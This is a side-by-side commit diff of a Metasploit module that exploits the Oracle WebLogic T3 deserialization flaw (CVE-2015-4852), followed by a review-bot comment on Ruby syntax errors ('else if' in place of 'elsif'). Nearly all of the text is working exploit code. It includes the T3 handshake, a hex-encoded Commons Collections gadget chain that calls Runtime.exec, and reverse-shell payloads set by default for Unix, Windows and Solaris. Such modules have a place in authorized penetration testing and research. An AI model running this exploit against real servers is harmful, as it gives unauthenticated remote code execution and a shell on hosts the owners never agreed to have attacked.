Some fixes to pass msftidy.

Andres Rodriguez 2018-12-15 18:32:17 -08:00
parent 446144ba8e
commit 82db6025c9
1 changed files with 261 additions and 262 deletions


@ -6,289 +6,288 @@
require 'msf/core/exploit/powershell' require 'msf/core/exploit/powershell'
class MetasploitModule < Msf::Exploit::Remote class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking Rank = ManualRanking
include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Powershell include Msf::Exploit::Powershell
def initialize(info={}) def initialize(info={})
super(update_info(info, super(update_info(info,
'Name' => 'Oracle Weblogic Server Deserialization RCE - Raw Object', 'Name' => 'Oracle Weblogic Server Deserialization RCE - Raw Object',
'Description' => %q{ 'Description' => %q{
An unauthenticated attacker with network access to the Oracle Weblogic Server T3 An unauthenticated attacker with network access to the Oracle Weblogic Server T3
interface can send a serialized object (weblogic.jms.common.StreamMessageImpl) interface can send a serialized object (weblogic.jms.common.StreamMessageImpl)
to the interface to execute code on vulnerable hosts. to the interface to execute code on vulnerable hosts.
}, },
'Author' => 'Author' =>
[ [
'Andres Rodriguez <arodriguez[at]2secure.org>', # Metasploit Module - (@acamro, acamro[at]gmail.com) 'Andres Rodriguez <arodriguez[at]2secure.org>', # Metasploit Module - (@acamro, acamro[at]gmail.com)
'Stephen Breen', # Vulnerability Discovery 'Stephen Breen', # Vulnerability Discovery
'Jacob Robles' # Metasploit Module Template 'Jacob Robles' # Metasploit Module Template
], ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'References' => 'References' =>
[ [
['CVE', '2015-4852'] ['CVE', '2015-4852']
], ],
'Privileged' => false, 'Privileged' => false,
'Platform' => %w{ unix win solaris }, 'Platform' => %w{ unix win solaris },
'Targets' => 'Targets' =>
[ [
[ 'Unix', [ 'Unix',
'Platform' => 'unix', 'Platform' => 'unix',
'Arch' => ARCH_CMD, 'Arch' => ARCH_CMD,
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'}, 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'},
'Payload' => { 'Payload' => {
'Encoder' => 'cmd/ifs', 'Encoder' => 'cmd/ifs',
'BadChars' => ' ', 'BadChars' => ' ',
'Compat' => {'PayloadType' => 'cmd', 'RequiredCmd' => 'python'} 'Compat' => {'PayloadType' => 'cmd', 'RequiredCmd' => 'python'}
} }
], ],
[ 'Windows', [ 'Windows',
'Platform' => 'win', 'Platform' => 'win',
'Payload' => {}, 'Payload' => {},
'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'} 'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'}
], ],
[ 'Solaris', [ 'Solaris',
'Platform' => 'solaris', 'Platform' => 'solaris',
'Arch' => ARCH_CMD, 'Arch' => ARCH_CMD,
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'}, 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'},
'Payload' => { 'Payload' => {
'Space' => 2048, 'Space' => 2048,
'DisableNops' => true, 'DisableNops' => true,
'Compat' => 'Compat' =>
{ {
'PayloadType' => 'cmd', 'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl telnet', 'RequiredCmd' => 'generic perl telnet',
} }
} }
], ]
[ 'Java (Generic)', ],
'Platform' => 'java', 'DefaultTarget' => 0,
'Arch' => ARCH_JAVA 'DefaultOptions' =>
] {
], 'RPORT' => 7001
'DefaultTarget' => 0, },
'DefaultOptions' => 'DisclosureDate' => 'Jan 28 2015'))
{ end
'RPORT' => 7001
},
'DisclosureDate' => 'Jan 28 2015'))
end
def check def check
connect connect
req = "GET /console/login/LoginForm.jsp HTTP/1.1\n" req = "GET /console/login/LoginForm.jsp HTTP/1.1\n"
req << "Host: #{peer}\n\n" req << "Host: #{peer}\n\n"
sock.put(req) sock.put(req)
res = sock.get_once res = sock.get_once
disconnect disconnect
return CheckCode::Unknown unless res return CheckCode::Unknown unless res
/WebLogic Server Version: (?<version>\d+\.\d+\.\d+\.*\d*)/ =~ res /WebLogic Server Version: (?<version>\d+\.\d+\.\d+\.*\d*)/ =~ res
if version if version
version = Gem::Version.new(version) version = Gem::Version.new(version)
vprint_good("Detected Oracle WebLogic Server Version: #{version.to_s}") vprint_good("Detected Oracle WebLogic Server Version: #{version.to_s}")
case case
when version.to_s.start_with?('10.3') when version.to_s.start_with?('10.3')
return CheckCode::Appears unless version > Gem::Version.new('10.3.6.0') return CheckCode::Appears unless version > Gem::Version.new('10.3.6.0')
when version.to_s.start_with?('12.1.2') when version.to_s.start_with?('12.1.2')
return CheckCode::Appears unless version > Gem::Version.new('12.1.2.0') return CheckCode::Appears unless version > Gem::Version.new('12.1.2.0')
when version.to_s.start_with?('12.1.3') when version.to_s.start_with?('12.1.3')
return CheckCode::Appears unless version > Gem::Version.new('12.1.3.0') return CheckCode::Appears unless version > Gem::Version.new('12.1.3.0')
when version.to_s.start_with?('12.2') when version.to_s.start_with?('12.2')
return CheckCode::Appears unless version > Gem::Version.new('12.2.1.0') return CheckCode::Appears unless version > Gem::Version.new('12.2.1.0')
end end
end end
if res.include?('Oracle WebLogic Server Administration Console') if res.include?('Oracle WebLogic Server Administration Console')
return CheckCode::Detected return CheckCode::Detected
end end
CheckCode::Unknown CheckCode::Unknown
end end
def t3_handshake def t3_handshake
shake = '74332031322e322e310a41533a323535' shake = '74332031322e322e310a41533a323535'
shake << '0a484c3a31390a4d533a313030303030' shake << '0a484c3a31390a4d533a313030303030'
shake << '30300a0a' shake << '30300a0a'
sock.put([shake].pack('H*')) sock.put([shake].pack('H*'))
sleep(1) sleep(1)
sock.get_once sock.get_once
end end
def build_t3_request_object def build_t3_request_object
# T3 request serialized data # T3 request serialized data
data = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a' data = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a'
data << '56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278' data << '56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278'
data << '700000000a000000030000000000000006007070707070700000000a00000003' data << '700000000a000000030000000000000006007070707070700000000a00000003'
data << '0000000000000006007006fe010000aced00057372001d7765626c6f6769632e' data << '0000000000000006007006fe010000aced00057372001d7765626c6f6769632e'
data << '726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078' data << '726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078'
data << '707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e506163' data << '707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e506163'
data << '6b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d69' data << '6b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d69'
data << '6e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b' data << '6e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b'
data << '5a000e74656d706f7261727950617463684c0009696d706c5469746c65740012' data << '5a000e74656d706f7261727950617463684c0009696d706c5469746c65740012'
data << '4c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271' data << '4c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271'
data << '007e00034c000b696d706c56657273696f6e71007e000378707702000078fe01' data << '007e00034c000b696d706c56657273696f6e71007e000378707702000078fe01'
data << '0000aced00057372001d7765626c6f6769632e726a766d2e436c617373546162' data << '0000aced00057372001d7765626c6f6769632e726a766d2e436c617373546162'
data << '6c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e' data << '6c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e'
data << '636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f9722455164' data << '636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f9722455164'
data << '52463e0200035b00087061636b616765737400275b4c7765626c6f6769632f63' data << '52463e0200035b00087061636b616765737400275b4c7765626c6f6769632f63'
data << '6f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e7265' data << '6f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e7265'
data << '6c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e67' data << '6c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e67'
data << '3b5b001276657273696f6e496e666f417342797465737400025b427872002477' data << '3b5b001276657273696f6e496e666f417342797465737400025b427872002477'
data << '65626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b61676549' data << '65626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b61676549'
data << '6e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f724900' data << '6e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f724900'
data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465' data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'
data << '6d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a' data << '6d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a'
data << '696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e' data << '696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e'
data << '000478707702000078fe010000aced00057372001d7765626c6f6769632e726a' data << '000478707702000078fe010000aced00057372001d7765626c6f6769632e726a'
data << '766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c0000787072' data << '766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c0000787072'
data << '00217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5065657249' data << '00217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5065657249'
data << '6e666f585474f39bc908f10200064900056d616a6f724900056d696e6f724900' data << '6e666f585474f39bc908f10200064900056d616a6f724900056d696e6f724900'
data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465' data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'
data << '6d706f7261727950617463685b00087061636b616765737400275b4c7765626c' data << '6d706f7261727950617463685b00087061636b616765737400275b4c7765626c'
data << '6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f' data << '6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f'
data << '3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5665' data << '3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5665'
data << '7273696f6e496e666f972245516452463e0200035b00087061636b6167657371' data << '7273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
data << '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c61' data << '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c61'
data << '6e672f537472696e673b5b001276657273696f6e496e666f4173427974657374' data << '6e672f537472696e673b5b001276657273696f6e496e666f4173427974657374'
data << '00025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c' data << '00025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c'
data << '2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f7249' data << '2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f7249'
data << '00056d696e6f7249000c726f6c6c696e67506174636849000b73657276696365' data << '00056d696e6f7249000c726f6c6c696e67506174636849000b73657276696365'
data << '5061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c' data << '5061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c'
data << '6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56' data << '6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56'
data << '657273696f6e71007e000578707702000078fe00fffe010000aced0005737200' data << '657273696f6e71007e000578707702000078fe00fffe010000aced0005737200'
data << '137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078' data << '137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078'
data << '707750210000000000000000000d3139322e3136382e312e323237001257494e' data << '707750210000000000000000000d3139322e3136382e312e323237001257494e'
data << '2d4147444d565155423154362e656883348cd6000000070000' data << '2d4147444d565155423154362e656883348cd6000000070000'
data << rport.to_s(16).rjust(4, '0') data << rport.to_s(16).rjust(4, '0')
data << 'ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced00' data << 'ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced00'
data << '05737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a' data << '05737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a'
data << '0c0000787077200114dc42bd071a7727000d3234322e3231342e312e32353461' data << '0c0000787077200114dc42bd071a7727000d3234322e3231342e312e32353461'
data << '863d1d0000000078' data << '863d1d0000000078'
sock.put([data].pack('H*')) sock.put([data].pack('H*'))
sleep(1) sleep(1)
sock.get_once sock.get_once
end end
def send_payload_objdata def send_payload_objdata
# payload creation # payload creation
if target.name == 'Windows' if target.name == 'Windows'
pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true}) pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true})
mycmd = pwrshl.each_byte.map {|b| b.to_s(16)}.join mycmd = pwrshl.each_byte.map {|b| b.to_s(16)}.join
else else if target.name == 'Unix'
nix_cmd = payload.encoded nix_cmd = payload.encoded
nix_cmd.prepend('/bin/sh -c ') nix_cmd.prepend('/bin/sh -c ')
mycmd = nix_cmd.each_byte.map {|b| b.to_s(16)}.join mycmd = nix_cmd.each_byte.map {|b| b.to_s(16)}.join
end else if target.name == 'Solaris'
sol_cmd = payload.encoded
serialized_cmd = (mycmd.length >> 1).to_s(16).rjust(4,'0') mycmd = sol_cmd.each_byte.map {|b| b.to_s(16)}.join
serialized_cmd << mycmd end
payload = '056508000000010000001b0000005d0101007372017870737202787000000000'
payload << '00000000757203787000000000787400087765626c6f67696375720478700000'
payload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced'
payload << '00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e'
payload << '7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e0020000'
payload << '78707702000078fe010000aced00057372001d7765626c6f6769632e726a766d'
payload << '2e436c6173735461626c65456e7472792f52658157f4f9ed0c00007870720013'
payload << '5b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c0200007870'
payload << '7702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e43'
payload << '6c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a61'
payload << '76612e7574696c2e566563746f72d9977d5b803baf0103000349001163617061'
payload << '63697479496e6372656d656e7449000c656c656d656e74436f756e745b000b65'
payload << '6c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b'
payload << '78707702000078fe010000'
# new payload serialized_cmd = (mycmd.length >> 1).to_s(16).rjust(4,'0')
payload << 'aced00057372003273756e2e7265666c6563742e616e6e6f746174696f6e2e41' serialized_cmd << mycmd
payload << '6e6e6f746174696f6e496e766f636174696f6e48616e646c657255caf50f15cb'
payload << '7ea50200024c000c6d656d62657256616c75657374000f4c6a6176612f757469'
payload << '6c2f4d61703b4c0004747970657400114c6a6176612f6c616e672f436c617373'
payload << '3b7870737d00000001000d6a6176612e7574696c2e4d6170787200176a617661'
payload << '2e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c00'
payload << '01687400254c6a6176612f6c616e672f7265666c6563742f496e766f63617469'
payload << '6f6e48616e646c65723b78707371007e00007372002a6f72672e617061636865'
payload << '2e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d6170'
payload << '6ee594829e7910940300014c0007666163746f727974002c4c6f72672f617061'
payload << '6368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f72'
payload << '6d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c'
payload << '6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f'
payload << '726d657230c797ec287a97040200015b000d695472616e73666f726d65727374'
payload << '002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f'
payload << '6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368'
payload << '652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65'
payload << '723bbd562af1d83418990200007870000000057372003b6f72672e6170616368'
payload << '652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e43'
payload << '6f6e7374616e745472616e73666f726d6572587690114102b1940200014c0009'
payload << '69436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870'
payload << '767200116a6176612e6c616e672e52756e74696d650000000000000000000000'
payload << '78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374'
payload << '696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d6572'
payload << '87e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e'
payload << '672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f'
payload << '6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a'
payload << '6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e67'
payload << '2e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452'
payload << '756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7ae'
payload << 'cbcd5a990200007870000000007400096765744d6574686f647571007e001e00'
payload << '000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202'
payload << '000078707671007e001e7371007e00167571007e001b00000002707571007e00'
payload << '1b00000000740006696e766f6b657571007e001e00000002767200106a617661'
payload << '2e6c616e672e4f626a656374000000000000000000000078707671007e001b73'
payload << '71007e0016757200135b4c6a6176612e6c616e672e537472696e673badd256e7'
payload << 'e91d7b4702000078700000000174'
payload << serialized_cmd
payload << '740004657865637571007e001e0000000171007e00237371007e001173720011'
payload << '6a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576'
payload << '616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b'
payload << '020000787000000001737200116a6176612e7574696c2e486173684d61700507'
payload << 'dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f'
payload << '6c6478703f40000000000000770800000010000000007878767200126a617661'
payload << '2e6c616e672e4f766572726964650000000000000000000000787071007e003a'
# serialized end
payload << 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461'
payload << '626c6553657276696365436f6e74657874ddcba8706386f0ba0c000078720029'
payload << '7765626c6f6769632e726d692e70726f76696465722e42617369635365727669'
payload << '6365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765'
payload << '626c6f6769632e726d692e696e7465726e616c2e4d6574686f64446573637269'
payload << '70746f7212485a828af7f67b0c000078707734002e61757468656e7469636174'
payload << '65284c7765626c6f6769632e73656375726974792e61636c2e55736572496e66'
payload << '6f3b290000001b7878fe00ff'
data = ((payload.length >> 1) + 4).to_s(16).rjust(8,'0') payload = '056508000000010000001b0000005d0101007372017870737202787000000000'
data << payload payload << '00000000757203787000000000787400087765626c6f67696375720478700000'
payload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced'
payload << '00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e'
payload << '7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e0020000'
payload << '78707702000078fe010000aced00057372001d7765626c6f6769632e726a766d'
payload << '2e436c6173735461626c65456e7472792f52658157f4f9ed0c00007870720013'
payload << '5b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c0200007870'
payload << '7702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e43'
payload << '6c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a61'
payload << '76612e7574696c2e566563746f72d9977d5b803baf0103000349001163617061'
payload << '63697479496e6372656d656e7449000c656c656d656e74436f756e745b000b65'
payload << '6c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b'
payload << '78707702000078fe010000'
sock.put([data].pack('H*')) # new payload
sleep(1) payload << 'aced00057372003273756e2e7265666c6563742e616e6e6f746174696f6e2e41'
sock.get_once payload << '6e6e6f746174696f6e496e766f636174696f6e48616e646c657255caf50f15cb'
payload << '7ea50200024c000c6d656d62657256616c75657374000f4c6a6176612f757469'
end payload << '6c2f4d61703b4c0004747970657400114c6a6176612f6c616e672f436c617373'
payload << '3b7870737d00000001000d6a6176612e7574696c2e4d6170787200176a617661'
payload << '2e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c00'
payload << '01687400254c6a6176612f6c616e672f7265666c6563742f496e766f63617469'
payload << '6f6e48616e646c65723b78707371007e00007372002a6f72672e617061636865'
payload << '2e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d6170'
payload << '6ee594829e7910940300014c0007666163746f727974002c4c6f72672f617061'
payload << '6368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f72'
payload << '6d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c'
payload << '6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f'
payload << '726d657230c797ec287a97040200015b000d695472616e73666f726d65727374'
payload << '002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f'
payload << '6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368'
payload << '652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65'
payload << '723bbd562af1d83418990200007870000000057372003b6f72672e6170616368'
payload << '652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e43'
payload << '6f6e7374616e745472616e73666f726d6572587690114102b1940200014c0009'
payload << '69436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870'
payload << '767200116a6176612e6c616e672e52756e74696d650000000000000000000000'
payload << '78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374'
payload << '696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d6572'
payload << '87e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e'
payload << '672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f'
payload << '6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a'
payload << '6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e67'
payload << '2e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452'
payload << '756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7ae'
payload << 'cbcd5a990200007870000000007400096765744d6574686f647571007e001e00'
payload << '000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202'
payload << '000078707671007e001e7371007e00167571007e001b00000002707571007e00'
payload << '1b00000000740006696e766f6b657571007e001e00000002767200106a617661'
payload << '2e6c616e672e4f626a656374000000000000000000000078707671007e001b73'
payload << '71007e0016757200135b4c6a6176612e6c616e672e537472696e673badd256e7'
payload << 'e91d7b4702000078700000000174'
def exploit payload << serialized_cmd
connect
print_status('Sending handshake...')
t3_handshake
print_status('Sending T3 request object...') payload << '740004657865637571007e001e0000000171007e00237371007e001173720011'
build_t3_request_object payload << '6a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576'
payload << '616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b'
payload << '020000787000000001737200116a6176612e7574696c2e486173684d61700507'
payload << 'dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f'
payload << '6c6478703f40000000000000770800000010000000007878767200126a617661'
payload << '2e6c616e672e4f766572726964650000000000000000000000787071007e003a'
# serialized end
print_status('Sending client object payload...') payload << 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461'
send_payload_objdata payload << '626c6553657276696365436f6e74657874ddcba8706386f0ba0c000078720029'
payload << '7765626c6f6769632e726d692e70726f76696465722e42617369635365727669'
payload << '6365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765'
payload << '626c6f6769632e726d692e696e7465726e616c2e4d6574686f64446573637269'
payload << '70746f7212485a828af7f67b0c000078707734002e61757468656e7469636174'
payload << '65284c7765626c6f6769632e73656375726974792e61636c2e55736572496e66'
payload << '6f3b290000001b7878fe00ff'
handler data = ((payload.length >> 1) + 4).to_s(16).rjust(8,'0')
disconnect data << payload
end
sock.put([data].pack('H*'))
sleep(1)
sock.get_once
end
def exploit
connect
print_status('Sending handshake...')
t3_handshake
print_status('Sending T3 request object...')
build_t3_request_object
print_status('Sending client object payload...')
send_payload_objdata
handler
disconnect
end
end end
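Review bot: The target dispatch in send_payload_objdata on the new side reads `else if target.name == 'Unix'` and `else if target.name == 'Solaris'`; if that is the literal text rather than an artefact of the side-by-side rendering, each `else if` opens a nested `if` that the single `end` after the Solaris branch does not close, so the file will no longer parse and msftidy would not have caught it. Ruby's keyword is `elsif`, so the two lines should be `elsif target.name == 'Unix'` and `elsif target.name == 'Solaris'`. The chain also has no final `else`, so a target name outside those three leaves mycmd nil and `mycmd.length` on the following line raises NoMethodError; that looks unreachable with the three targets now declared, but a closing `else` that calls fail_with would make the assumption explicit. As a point of style, assigning the local `payload = '0565...'` shadows the mixin's `payload` method for the rest of the method body; the earlier `payload.encoded` calls still resolve to the method because they precede the assignment lexically, but renaming the local (e.g. `obj_data`) would remove the ambiguity.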